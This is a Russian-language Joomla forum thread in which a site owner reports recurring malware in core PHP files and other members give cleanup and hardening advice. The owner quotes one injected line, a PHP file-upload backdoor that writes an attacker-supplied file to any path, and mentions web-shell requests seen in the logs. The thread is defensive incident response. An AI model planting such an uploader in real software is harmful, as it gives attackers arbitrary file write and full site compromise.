0 Пользователей и 1 Гость просматривают эту тему.
  • 19 Ответов
  • 3508 Просмотров
*

13th_doctor_who

  • Захожу иногда
  • 12
  • 0
Уязвимость Joomla
« : 07.06.2015, 16:56:48 »
Добрый день, проблема такая, в 5х php файлах (loader.php , import.legacy.php, cms.php...) были обнаружены такие строчки:
"if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); echo 'OK'; Exit;}"
после чего сайт перестал работать до их удаления, 3 недели до этого, был похожий случай, так же пофикшен их удалением, в чем проблема, где может быть дыра?
Так же в файле config.php содержится такой код, это нормально?
Спойлер
[свернуть]
*

draff

  • Практически профи
  • 2770
  • 171
  • step by step
Re: Уязвимость Joomla
« Ответ #1 : 07.06.2015, 17:12:21 »
версия Joomla ? сканером еще поищи вирус/шелл
config.php удали
*

13th_doctor_who

  • Захожу иногда
  • 12
  • 0
Re: Уязвимость Joomla
« Ответ #2 : 07.06.2015, 17:29:08 »
версия Joomla ? сканером еще поищи вирус/шелл
config.php удали
Версия 3.1, какой сканер посоветуете? config.php удалил
*

13th_doctor_who

  • Захожу иногда
  • 12
  • 0
Re: Уязвимость Joomla
« Ответ #4 : 11.06.2015, 21:01:16 »
Почистил сайт, но начали появлятся файлы под названиями "config.php" "libraries/joomla/crypt/error.php" "public_html/includes/system.php" "./public_html/images/sampledata/xml.php
.//public_html/images/color/session.php
./public_html/sxd/lang/view.php"
С содержимым по типу config.php в шапке топика, в чем может быть проблема, неужто из за версии движка 3.3.1? Есть ли способы найти проблему и что делать? В логах ничего интересного.
*

beliyadm

  • Профи
  • 8368
  • 1527
  • Севастополь == Россия
Re: Уязвимость Joomla
« Ответ #5 : 11.06.2015, 21:05:24 »
значит внимательно читать access.log и прочие логи, скорей всего где то сидит типа шелл, который это дело и производит
Можно пройтись поиском по всему сайту, поискать где есть вхождение eval
Все расширения на сайте легальны и куплены? Пароли на все (фтп, бд, админ) изменены?
Все истины, которые я хочу вам изложить, — бесстыдная ложь.
Записки нетрезвого кодера || -=Joomla FAQ=- || -=все плохо=- || skype: beliyadm_pb
*

13th_doctor_who

  • Захожу иногда
  • 12
  • 0
Re: Уязвимость Joomla
« Ответ #6 : 11.06.2015, 21:19:17 »
значит внимательно читать access.log и прочие логи, скорей всего где то сидит типа шелл, который это дело и производит
Можно пройтись поиском по всему сайту, поискать где есть вхождение eval
Все расширения на сайте легальны и куплены? Пароли на все (фтп, бд, админ) изменены?
Все легально, все пароли сменили, на eval искал по ftp, много нашёл и удалил, проверил антивирусниками и в ручную, но вчера опять появился новый файл ("libraries/joomla/crypt/error.php"), в котором был вредоносный код, в логах ничего интересного нет.
*

draff

  • Практически профи
  • 2770
  • 171
  • step by step
Re: Уязвимость Joomla
« Ответ #7 : 11.06.2015, 21:24:46 »
Встречал еще и такой файл, в начале проверка пароля через $auth_pass , а потом обфусцированный код
*

13th_doctor_who

  • Захожу иногда
  • 12
  • 0
Re: Уязвимость Joomla
« Ответ #8 : 11.06.2015, 21:27:32 »
Встречал еще и такой файл, в начале проверка пароля через $auth_pass , а потом обфусцированный код
Что в таком случае делать? Обновлять двиг не хочется, да и не уверен что поможет, чистить каждый день от вирусов тоже не вариант, хостинг уже заблокировал почтовые ф-ции аккаунта...
*

beliyadm

  • Профи
  • 8368
  • 1527
  • Севастополь == Россия
Re: Уязвимость Joomla
« Ответ #9 : 11.06.2015, 21:30:49 »
слить все на локаль, еще раз проверить всеми антивирусами и руками на eval и подобное
сменить все логины\пароли, адреса, ipшники, страну проживания

Ну честно, не бывает чудес, либо вы ставили варезное расширение либо у вас в компе вирус, который есть младенцев берет пароли с ftp клиента и все
Все истины, которые я хочу вам изложить, — бесстыдная ложь.
Записки нетрезвого кодера || -=Joomla FAQ=- || -=все плохо=- || skype: beliyadm_pb
*

draff

  • Практически профи
  • 2770
  • 171
  • step by step
Re: Уязвимость Joomla
« Ответ #10 : 11.06.2015, 22:16:08 »
Что в таком случае делать? Обновлять двиг не хочется, да и не уверен что поможет, чистить каждый день от вирусов тоже не вариант, хостинг уже заблокировал почтовые ф-ции аккаунта...
Если Joomla твоей версии и расширения содержать уязвимость, то нет смысла каждый день чистить.
Можно применить сканер мониторинга файлов, типа Eyesite . Узнать откуда рассылка спама можно, если версия PHP не ниже 5.3, с помощью mail.add_x_header
*

beliyadm

  • Профи
  • 8368
  • 1527
  • Севастополь == Россия
Re: Уязвимость Joomla
« Ответ #11 : 11.06.2015, 22:17:55 »
Если Joomla твоей версии и расширения содержать уязвимость, то нет смысла каждый день чистить.
Простите, что? если расширения содержат уязвимость - нет смысла их искать и чистить?
И что означает "твоей"?
Все истины, которые я хочу вам изложить, — бесстыдная ложь.
Записки нетрезвого кодера || -=Joomla FAQ=- || -=все плохо=- || skype: beliyadm_pb
*

13th_doctor_who

  • Захожу иногда
  • 12
  • 0
Re: Уязвимость Joomla
« Ответ #12 : 12.06.2015, 01:31:20 »
Проверил файлы, нашёл в 30 файлах такой код:
Так же заметил, что все файлы были модифицырованы 08.06 в 1.27
Ацес логи за то время:
Спойлер
[свернуть]
*

13th_doctor_who

  • Захожу иногда
  • 12
  • 0
Re: Уязвимость Joomla
« Ответ #13 : 12.06.2015, 01:35:49 »
Насколько я понял, все началось после ""GET /cache/cwm.php " в самом файле, который я потер только что, лежал огромный eval код, так ли?
За 7 число нашёл логи с файлом cwp.php в котором похожий код:
Спойлер
[свернуть]
Что скажете по логам, каким способом вредоносные файлы попали на сайт? Все таки проблема в слитых паролях или каких то уязвимостях?
« Последнее редактирование: 12.06.2015, 01:46:50 от 13th_doctor_who »
*

draff

  • Практически профи
  • 2770
  • 171
  • step by step
Re: Уязвимость Joomla
« Ответ #14 : 12.06.2015, 07:56:08 »
.htaccess , с запретом на выполнение скриптов, в папку кеш, и желательно еще и в /images
*

13th_doctor_who

  • Захожу иногда
  • 12
  • 0
Re: Уязвимость Joomla
« Ответ #16 : 12.06.2015, 14:10:34 »
.htaccess , с запретом на выполнение скриптов, в папку кеш, и желательно еще и в /images
Не думаю что поможет, так как подобная проблема была в других папках, может посоветуете какой то плагин, который заблокирует действия по типу:
"POST /cache/com_jcomments_objects_com_jshopping/plugin.php"
*

winstrool

  • Завсегдатай
  • 770
  • 41
  • Свободен для работы
Re: Уязвимость Joomla
« Ответ #17 : 12.06.2015, 14:59:44 »
Не думаю что поможет, так как подобная проблема была в других папках, может посоветуете какой то плагин, который заблокирует действия по типу:
"POST /cache/com_jcomments_objects_com_jshopping/plugin.php"
Другие папки тоже надо закрывать, а не только кеш и images

Что скажете по логам, каким способом вредоносные файлы попали на сайт? Все таки проблема в слитых паролях или каких то уязвимостях?
этих логов не достаточно, было бы не плохо посмотреть дату создания и модификации вредоносных файлов и по цепочки отслеживать. Проблемой может быть что угодно, как просто слитые пароли, так и уязвимсоти и не надежность хостера, тут нужно комплексно подходить к решению задачи, грамматно навести профилактические меры, чистку вредоносов, выставить политику логирования, также бы не помешала, какая нить система IDS но такие систему могут нагружать работу CMS.
« Последнее редактирование: 12.06.2015, 15:08:57 от winstrool »
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

13th_doctor_who

  • Захожу иногда
  • 12
  • 0
Re: Уязвимость Joomla
« Ответ #18 : 12.06.2015, 15:11:49 »
Другие папки тоже надо закрывать, а не только кеш и images
Закрыл через .htaccess:
Спойлер
[свернуть]
Поставил на сайт: Eyesite (Для мониторинга изменений) и Marco's SQL Injection - LFI Interceptor для защиты.
Почистил все файлы, буду надеяться что поможет.
*

winstrool

  • Завсегдатай
  • 770
  • 41
  • Свободен для работы
Re: Уязвимость Joomla
« Ответ #19 : 12.06.2015, 15:16:20 »
Закрыл через .htaccess:
Спойлер
[свернуть]
Поставил на сайт: Eyesite (Для мониторинга изменений) и Marco's SQL Injection - LFI Interceptor для защиты.
Почистил все файлы, буду надеяться что поможет.
Недостаточно расширений, обходятся легко!, не поможет.
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как исправить уязвимость в Joomla 1.5.26 - libraries/phpmailer/phpmailer.php - RCE : CVE-2016-10045,?

Автор Elimelech

Ответов: 4
Просмотров: 488
Последний ответ 03.09.2017, 16:24:17
от Sorbon
sql injection for Joomla 3.7

Автор winstrool

Ответов: 5
Просмотров: 302
Последний ответ 22.05.2017, 21:49:11
от Septdir
Взлом Joomla 3

Автор tiberian

Ответов: 1
Просмотров: 266
Последний ответ 31.03.2017, 16:16:50
от SeBun
Совет по Joomla 3.6.5

Автор blackenvy

Ответов: 14
Просмотров: 279
Последний ответ 28.03.2017, 13:53:07
от dmitry_stas
Критическая уязвимость в PHPMailer

Автор b2z

Ответов: 17
Просмотров: 2274
Последний ответ 23.02.2017, 19:36:05
от bestshoko